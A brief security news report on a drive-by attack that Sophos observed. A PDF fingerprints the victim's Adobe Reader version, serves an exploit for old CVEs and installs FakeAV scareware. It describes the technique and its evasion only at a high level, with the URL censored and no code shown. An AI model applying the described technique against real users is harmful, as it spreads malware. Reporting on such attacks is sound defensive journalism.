14 DAY TRIAL // Security researchers at Sophos have intercepted a Web attack where a PDF document is used to detect the version of Adobe Reader and serve the appropriate exploit. If exploitation is sucessful, a FAKEAV variant is downloaded and installed on the victim's computer.
Web-based exploitation is one of the primary methods of infecting users with malware. These attacks, also known as drive-by downloads, redirect users through a series of scripts, which have the purpose of detecting their browser version and checking if potentially vulnerable programs are installed on their computer.
Once a profile of the victim has been created, exploits targeting remote code execution vulnerabilities in one or more of his applications are served through his browser. In most of the cases the scripts that handle all the process are written in JavaScript, are obfuscated and are hosted on different servers to make takedown attempts harder.
However, in the attack reported by Sophos a PDF file is used for this task. "The initial URL directs you to http://CENSORED/kt/ck_fuh/w###_.pdf. This PDF is unlike many other malicious PDFs in that it detects the version of Adobe Reader/Acrobat you are using and directs you to a payload that can take advantage of your specific unpatched vulnerabilities," Chester Wisniewski, senior security advisor at Sophos, explains on his blog.
The hackers' choice to do this through a PDF file is probably meant to make it harder for security researchers to spot the attack. This idea is enforced by the fact that the payload is only served and the second URL is accessed with Adobe Reader. Opening it in a browser triggers a redirect to google.com.
According to the Sophos antivirus expert, the exploits used in this attack target old Adobe Reader vulnerabilities identified as CVE-2008-2992, CVE-2009-0927, CVE-2009-4324 and CVE-2007-5659, which date back to February 2009. If exploitation is successful, a scareware variant detected by Sophos as Troj/FakeAV-BKB is installed.
You can follow the editor on Twitter @lconstantin